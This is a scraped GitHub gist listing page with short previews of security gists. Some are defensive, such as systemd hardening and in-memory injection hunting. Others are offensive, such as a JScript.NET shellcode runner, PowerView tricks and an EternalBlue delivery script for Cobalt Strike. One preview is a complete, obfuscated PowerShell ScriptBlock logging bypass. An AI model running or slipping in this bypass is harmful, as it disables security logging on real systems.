Skip to content

Instantly share code, notes, and snippets.

View mgeeky's full-sized avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
2.7k followers · 104 following
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
View GitHub Profile
@ageis
ageis / systemd_service_hardening.md
Last active June 27, 2025 13:40
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
@Ridter
Ridter / shellcode.js
Last active October 11, 2024 08:44
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active June 8, 2025 15:56
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@darkarnium
darkarnium / EnumerateIam.md
Last active May 19, 2024 20:31
A quick and VERY dirty IAM enumeration tool.

Enumerate IAM

The following code will attempt to enumerate operations that a given set of AWS AccessKeys can perform.

Usage

Usage: enumerate-iam.py [OPTIONS]

  IAM Account Enumerator.
@samuelcolvin
samuelcolvin / repair_boot.md
Created May 14, 2017 12:04
repairing boot for LUKS encrypted fs
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active May 22, 2025 11:30
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@lanmaster53
lanmaster53 / pyscripter-snippets.py
Last active May 6, 2024 05:03
Burp Python Scripter scripts
# Moved to https://github.com/lanmaster53/pyscripter-er/tree/master/snippets
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 27, 2025 13:46
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@chunter
chunter / pageant-autoload-keys-at-startup.txt
Created June 20, 2017 10:51
Make Pageant autoload keys at startup
To make Pageant automatically run and load keys at startup:
- Find the location of pageant.exe
- Windows key + R to open the 'run' dialog box
- Type: 'shell:startup' in the dialog box
- Create a shortcut to the pageant.exe and put into this startup folder.
@rsmudge
rsmudge / eternalblue.cna
Last active August 18, 2024 18:23
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;